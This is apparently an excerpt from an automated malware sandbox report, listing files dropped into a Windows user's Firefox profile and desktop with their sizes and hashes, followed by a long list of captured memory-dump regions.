C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

Filesize
116B

MD5
2a461e9eb87fd1955cea740a3444ee7a

SHA1
b10755914c713f5a4677494dbe8a686ed458c3c5

SHA256
4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

SHA512
34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\gmp-widevinecdm\4.10.2710.0\LICENSE.txt.tmp

Filesize
479B

MD5
49ddb419d96dceb9069018535fb2e2fc

SHA1
62aa6fea895a8b68d468a015f6e6ab400d7a7ca6

SHA256
2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539

SHA512
48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

Filesize
372B

MD5
bf957ad58b55f64219ab3f793e374316

SHA1
a11adc9d7f2c28e04d9b35e23b7616d0527118a1

SHA256
bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

SHA512
79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

Filesize
17.8MB

MD5
daf7ef3acccab478aaa7d6dc1c60f865

SHA1
f8246162b97ce4a945feced27b6ea114366ff2ad

SHA256
bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

SHA512
5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll.lib.tmp

Filesize
1KB

MD5
688bed3676d2104e7f17ae1cd2c59404

SHA1
952b2cdf783ac72fcb98338723e9afd38d47ad8e

SHA256
33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237

SHA512
7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll.sig.tmp

Filesize
1KB

MD5
36e5ee071a6f2f03c5d3889de80b0f0d

SHA1
cf6e8ddb87660ef1ef84ae36f97548a2351ac604

SHA256
6be809d16e0944386e45cf605eae0cd2cf46f111d1a6fe999fec813d2c378683

SHA512
99b61896659e558a79f0e9be95286ebf01d31d13b71df6db4923406e88b3ba72584ef2b62e073b2f5e06901af2c7d1b92d3d12187fe5b4b29c9dd2678444f34e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\prefs-1.js

Filesize
9KB

MD5
29a42bfbcac0d1220e45b3c0b4c2238c

SHA1
5d9b4dca039e9e58361b64e7cb1bbae830876750

SHA256
ea5919c3389ff2a0950dfb0312cd32a5ba7db988af7d73ead32d0a2473de13cb

SHA512
8c8b557069f3fe4346328cf2cf0cf14f840f7cfb549832409d76e5ed205b00f134993d1cfee73f514a0c4df52e4e3fbcbc26a1ea0dc01bbe4a85e83e063e897b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\prefs-1.js

Filesize
10KB

MD5
94e3b3f2d47763e7c60f21209b6669b2

SHA1
c7547a8df787e3c9456352973d83b1ccc3ab4ba6

SHA256
8ea1d3c1f5faf556cfb2a1813a3d584ee858db9409f405934f5004f70ca2fbc5

SHA512
98852be53b8515e6f3ddce6f2b4c5c639184366cc271d08ee6baeaf67c2aac8e07cd480e9def432fbd233d9da2164a3d5d93d8bfa74a7839a2cc67b4c09d5ab3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\prefs.js

Filesize
9KB

MD5
b29e1dc9e4c33e6628600a470830c72d

SHA1
25dd885586a6662202fb0d630a8e5e154ff54fef

SHA256
53846481fb2e6969a6733ac3e32719f8a5a0f73d4d1d0f6695460b425eed7fa5

SHA512
15ff69ec508382ee7503d28d7187502811213e8780e09e5224283fea7213b42500863a6ae72c3bb5e9ea17235a9176d46c07db5ad0523c469b74a0107dad4233

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
9.3MB

MD5
04a8f5cb74f084b6fbc9b838ade4407e

SHA1
77f6f5ffe25166cebd56fa93119273ceddb2a8f8

SHA256
d1271fe81b51ac08d00089b40163045a435f58aa1883d97e796c0a3c7576877a

SHA512
cd3682a8a4810d51c069b2f2363bc25e08375410fa4ebc4b8b052b1dd7ad7dccfc1844e3ddb2f3fcfc8bcfe4c0b1438bcb3a89e0c0d515394df1354a6eea71e4

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
9.4MB

MD5
2135af7c65f00cf8c67845aab3b686f7

SHA1
0125d56c9d9c09cfa8fbc29428e90c4b2f284642

SHA256
4d8f403a55fa31fc009ba83b55f313cb1e07584dbff6d718cc6c4118c0210f0e

SHA512
827fe8e45d936f3d1584b63883870895342b5336da6f38947ac5840aee598398bd8ba92e1ac0b80d1550712e8c9bb8ddc57d52df781ef9a151adf6194a849a8c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
9.4MB

MD5
872526caf72ebf9459c9aa80eea395c1

SHA1
4f369843df2034c2bee5fbe15d613cd39ccca0bf

SHA256
b34211c26b1514e36615534a2dfb926445b04535a7147e150f07a986f5ed2b65

SHA512
9b0a25aca50d100e0ed0638cb2aff892687d2db48abc38d65d5d9c1ca4deb5a9bfa079b90e801caf4ff9d92efa89dd5bacb70c6001d94c415c4336563f248f62

Download Submit
C:\Users\Admin\Desktop\YCL.lnk

Filesize
2KB

MD5
665db35c4ee30abd69f02e38ff7fe005

SHA1
dd11ccc5a97c02edd64a61a9598f04c28acf285a

SHA256
989db49e75925a9bca8a428655b5ddc6e2d53f1ebbc03824d1c4c822ef08694d

SHA512
bced4fdb7feb78ef23606eee897351adaf423a7441d0a0b848be98dafb74143e735793027da554adf779094a90516b365fef062c2e9be6f95ab5c53bde4a0b7c

Download Submit
memory/388-278-0x0000000005760000-0x0000000005AB4000-memory.dmp

Filesize
3.3MB

Download
memory/388-596-0x0000000007260000-0x00000000078DA000-memory.dmp

Filesize
6.5MB

Download
memory/388-597-0x0000000006000000-0x000000000601A000-memory.dmp

Filesize
104KB

Download
memory/388-290-0x0000000006070000-0x00000000060BC000-memory.dmp

Filesize
304KB

Download
memory/388-287-0x0000000005B20000-0x0000000005B3E000-memory.dmp

Filesize
120KB

Download
memory/388-265-0x00000000054C0000-0x0000000005526000-memory.dmp

Filesize
408KB

Download
memory/388-264-0x0000000005450000-0x00000000054B6000-memory.dmp

Filesize
408KB

Download
memory/388-263-0x0000000004B60000-0x0000000004B82000-memory.dmp

Filesize
136KB

Download
memory/388-670-0x0000000006F60000-0x0000000006F82000-memory.dmp

Filesize
136KB

Download
memory/388-669-0x0000000006FC0000-0x0000000007056000-memory.dmp

Filesize
600KB

Download
memory/388-261-0x0000000004D20000-0x0000000005348000-memory.dmp

Filesize
6.2MB

Download
memory/388-260-0x0000000002540000-0x0000000002576000-memory.dmp

Filesize
216KB

Download
memory/792-856-0x0000000000790000-0x00000000007EA000-memory.dmp

Filesize
360KB

Download
memory/824-2725-0x0000000009280000-0x00000000097AC000-memory.dmp

Filesize
5.2MB

Download
memory/824-1878-0x00000000078A0000-0x00000000079AA000-memory.dmp

Filesize
1.0MB

Download
memory/824-2762-0x0000000009230000-0x000000000924E000-memory.dmp

Filesize
120KB

Download
memory/824-1824-0x0000000000620000-0x0000000000A98000-memory.dmp

Filesize
4.5MB

Download
memory/824-1791-0x0000000000620000-0x0000000000A98000-memory.dmp

Filesize
4.5MB

Download
memory/824-2752-0x0000000009010000-0x00000000090A2000-memory.dmp

Filesize
584KB

Download
memory/824-1850-0x0000000007600000-0x000000000763C000-memory.dmp

Filesize
240KB

Download
memory/824-1827-0x0000000000620000-0x0000000000A98000-memory.dmp

Filesize
4.5MB

Download
memory/824-2716-0x0000000008B80000-0x0000000008D42000-memory.dmp

Filesize
1.8MB

Download
memory/824-1842-0x0000000007D10000-0x0000000008328000-memory.dmp

Filesize
6.1MB

Download
memory/824-3072-0x0000000000620000-0x0000000000A98000-memory.dmp

Filesize
4.5MB

Download
memory/824-1843-0x00000000075A0000-0x00000000075B2000-memory.dmp

Filesize
72KB

Download
memory/1172-102-0x00000000005B0000-0x0000000000A5F000-memory.dmp

Filesize
4.7MB

Download
memory/1172-117-0x00000000005B0000-0x0000000000A5F000-memory.dmp

Filesize
4.7MB

Download
memory/1404-683-0x0000000000700000-0x0000000000BAC000-memory.dmp

Filesize
4.7MB

Download
memory/1404-703-0x0000000000700000-0x0000000000BAC000-memory.dmp

Filesize
4.7MB

Download
memory/1472-860-0x0000000000400000-0x000000000045D000-memory.dmp

Filesize
372KB

Download
memory/1472-858-0x0000000000400000-0x000000000045D000-memory.dmp

Filesize
372KB

Download
memory/1872-885-0x0000000000260000-0x000000000071D000-memory.dmp

Filesize
4.7MB

Download
memory/1872-897-0x0000000000260000-0x000000000071D000-memory.dmp

Filesize
4.7MB

Download
memory/2012-71-0x0000000005250000-0x00000000057F4000-memory.dmp

Filesize
5.6MB

Download
memory/2012-70-0x00000000002E0000-0x0000000000390000-memory.dmp

Filesize
704KB

Download
memory/2332-783-0x0000000000790000-0x0000000000C20000-memory.dmp

Filesize
4.6MB

Download
memory/2332-770-0x0000000000790000-0x0000000000C20000-memory.dmp

Filesize
4.6MB

Download
memory/3008-971-0x0000000006530000-0x000000000657C000-memory.dmp

Filesize
304KB

Download
memory/3008-1375-0x0000000004DE0000-0x0000000004DEA000-memory.dmp

Filesize
40KB

Download
memory/3008-1377-0x0000000007680000-0x00000000076C2000-memory.dmp

Filesize
264KB

Download
memory/3008-1027-0x00000000072D0000-0x0000000007346000-memory.dmp

Filesize
472KB

Download
memory/3008-1000-0x0000000006320000-0x0000000006364000-memory.dmp

Filesize
272KB

Download
memory/3040-200-0x00000000007D0000-0x00000000011E2000-memory.dmp

Filesize
10.1MB

Download
memory/3040-228-0x00000000007D0000-0x00000000011E2000-memory.dmp

Filesize
10.1MB

Download
memory/3040-134-0x00000000007D0000-0x00000000011E2000-memory.dmp

Filesize
10.1MB

Download
memory/3040-189-0x00000000007D0000-0x00000000011E2000-memory.dmp

Filesize
10.1MB

Download
memory/3404-235-0x00000000006D0000-0x00000000006FF000-memory.dmp

Filesize
188KB

Download
memory/3404-230-0x00000000006D0000-0x00000000006FF000-memory.dmp

Filesize
188KB

Download
memory/3552-167-0x0000000000EC0000-0x000000000135E000-memory.dmp

Filesize
4.6MB

Download
memory/3552-170-0x0000000000EC0000-0x000000000135E000-memory.dmp

Filesize
4.6MB

Download
memory/3616-1026-0x0000000000D10000-0x0000000000D5C000-memory.dmp

Filesize
304KB

Download
memory/3660-150-0x00000000004D0000-0x0000000000EE2000-memory.dmp

Filesize
10.1MB

Download
memory/3660-210-0x00000000004D0000-0x0000000000EE2000-memory.dmp

Filesize
10.1MB

Download
memory/3660-201-0x00000000004D0000-0x0000000000EE2000-memory.dmp

Filesize
10.1MB

Download
memory/3660-236-0x00000000004D0000-0x0000000000EE2000-memory.dmp

Filesize
10.1MB

Download
memory/3740-151-0x0000000000590000-0x0000000001232000-memory.dmp

Filesize
12.6MB

Download
memory/3740-190-0x0000000069CC0000-0x000000006A71B000-memory.dmp

Filesize
10.4MB

Download
memory/3740-893-0x0000000000590000-0x0000000001232000-memory.dmp

Filesize
12.6MB

Download
memory/3740-834-0x0000000000590000-0x0000000001232000-memory.dmp

Filesize
12.6MB

Download
memory/3740-237-0x0000000000590000-0x0000000001232000-memory.dmp

Filesize
12.6MB

Download
memory/3740-152-0x0000000000590000-0x0000000001232000-memory.dmp

Filesize
12.6MB

Download
memory/3740-782-0x0000000000590000-0x0000000001232000-memory.dmp

Filesize
12.6MB

Download
memory/3740-91-0x0000000000590000-0x0000000001232000-memory.dmp

Filesize
12.6MB

Download
memory/4124-0-0x0000000000C40000-0x00000000010EF000-memory.dmp

Filesize
4.7MB

Download
memory/4124-2-0x0000000000C41000-0x0000000000CA9000-memory.dmp

Filesize
416KB

Download
memory/4124-3-0x0000000000C40000-0x00000000010EF000-memory.dmp

Filesize
4.7MB

Download
memory/4124-4-0x0000000000C40000-0x00000000010EF000-memory.dmp

Filesize
4.7MB

Download
memory/4124-18-0x0000000000C40000-0x00000000010EF000-memory.dmp

Filesize
4.7MB

Download
memory/4124-19-0x0000000000C41000-0x0000000000CA9000-memory.dmp

Filesize
416KB

Download
memory/4124-1-0x0000000076FA4000-0x0000000076FA6000-memory.dmp

Filesize
8KB

Download
memory/4160-112-0x0000000001170000-0x00000000011CF000-memory.dmp

Filesize
380KB

Download
memory/4324-599-0x0000000000400000-0x000000000045F000-memory.dmp

Filesize
380KB

Download
memory/4324-601-0x0000000000400000-0x000000000045F000-memory.dmp

Filesize
380KB

Download
memory/4364-1640-0x00000000005B0000-0x0000000000A5F000-memory.dmp

Filesize
4.7MB

Download
memory/4364-1668-0x00000000005B0000-0x0000000000A5F000-memory.dmp

Filesize
4.7MB

Download
memory/4404-831-0x0000000000190000-0x0000000000C6D000-memory.dmp

Filesize
10.9MB

Download
memory/4404-898-0x0000000000190000-0x0000000000C6D000-memory.dmp

Filesize
10.9MB

Download
memory/4404-894-0x0000000000190000-0x0000000000C6D000-memory.dmp

Filesize
10.9MB

Download
memory/4404-927-0x0000000000190000-0x0000000000C6D000-memory.dmp

Filesize
10.9MB

Download
memory/4420-280-0x0000000010000000-0x000000001001C000-memory.dmp

Filesize
112KB

Download
memory/4420-222-0x0000000000440000-0x000000000046F000-memory.dmp

Filesize
188KB

Download
memory/4420-221-0x0000000000440000-0x000000000046F000-memory.dmp

Filesize
188KB

Download
memory/4420-227-0x0000000000440000-0x000000000046F000-memory.dmp

Filesize
188KB

Download
memory/4532-74-0x0000000000400000-0x000000000045F000-memory.dmp

Filesize
380KB

Download
memory/4532-76-0x0000000000400000-0x000000000045F000-memory.dmp

Filesize
380KB

Download
memory/4956-49-0x00000000005B0000-0x0000000000A5F000-memory.dmp

Filesize
4.7MB

Download
memory/4956-21-0x00000000005B0000-0x0000000000A5F000-memory.dmp

Filesize
4.7MB

Download
memory/4956-16-0x00000000005B0000-0x0000000000A5F000-memory.dmp

Filesize
4.7MB

Download
memory/4956-679-0x00000000005B0000-0x0000000000A5F000-memory.dmp

Filesize
4.7MB

Download
memory/4956-864-0x00000000005B0000-0x0000000000A5F000-memory.dmp

Filesize
4.7MB

Download
memory/4956-20-0x00000000005B1000-0x0000000000619000-memory.dmp

Filesize
416KB

Download
memory/4956-22-0x00000000005B0000-0x0000000000A5F000-memory.dmp

Filesize
4.7MB

Download
memory/4956-50-0x00000000005B1000-0x0000000000619000-memory.dmp

Filesize
416KB

Download
memory/4956-51-0x00000000005B0000-0x0000000000A5F000-memory.dmp

Filesize
4.7MB

Download
memory/4956-199-0x00000000005B0000-0x0000000000A5F000-memory.dmp

Filesize
4.7MB

Download
memory/4956-813-0x00000000005B0000-0x0000000000A5F000-memory.dmp

Filesize
4.7MB

Download
memory/4956-132-0x00000000005B0000-0x0000000000A5F000-memory.dmp

Filesize
4.7MB

Download
memory/4956-77-0x00000000005B0000-0x0000000000A5F000-memory.dmp

Filesize
4.7MB

Download
memory/5000-188-0x00000000005C0000-0x0000000000C5E000-memory.dmp

Filesize
6.6MB

Download
memory/5000-186-0x00000000005C0000-0x0000000000C5E000-memory.dmp

Filesize
6.6MB

Download
memory/5360-587-0x0000000000CC0000-0x0000000000D1C000-memory.dmp

Filesize
368KB

Download
memory/5724-926-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/5748-1029-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/6032-950-0x00000000062D0000-0x00000000062DA000-memory.dmp

Filesize
40KB

Download
memory/6032-947-0x0000000007A10000-0x0000000007A21000-memory.dmp

Filesize
68KB

Download
memory/6032-949-0x00000000062E0000-0x00000000062F2000-memory.dmp

Filesize
72KB

Download
memory/6032-934-0x000000006F110000-0x000000006F15C000-memory.dmp

Filesize
304KB

Download
memory/6032-946-0x0000000007860000-0x000000000786A000-memory.dmp

Filesize
40KB

Download
memory/6032-933-0x0000000007670000-0x00000000076A2000-memory.dmp

Filesize
200KB

Download
memory/6032-944-0x0000000006A90000-0x0000000006AAE000-memory.dmp

Filesize
120KB

Download
memory/6032-923-0x00000000064F0000-0x000000000653C000-memory.dmp

Filesize
304KB

Download
memory/6032-945-0x00000000076B0000-0x0000000007753000-memory.dmp

Filesize
652KB

Download
memory/6032-917-0x0000000005D80000-0x00000000060D4000-memory.dmp

Filesize
3.3MB

Download
memory/7088-2308-0x0000000000D50000-0x00000000013DF000-memory.dmp

Filesize
6.6MB

Download
memory/7088-2384-0x0000000000D50000-0x00000000013DF000-memory.dmp

Filesize
6.6MB

Download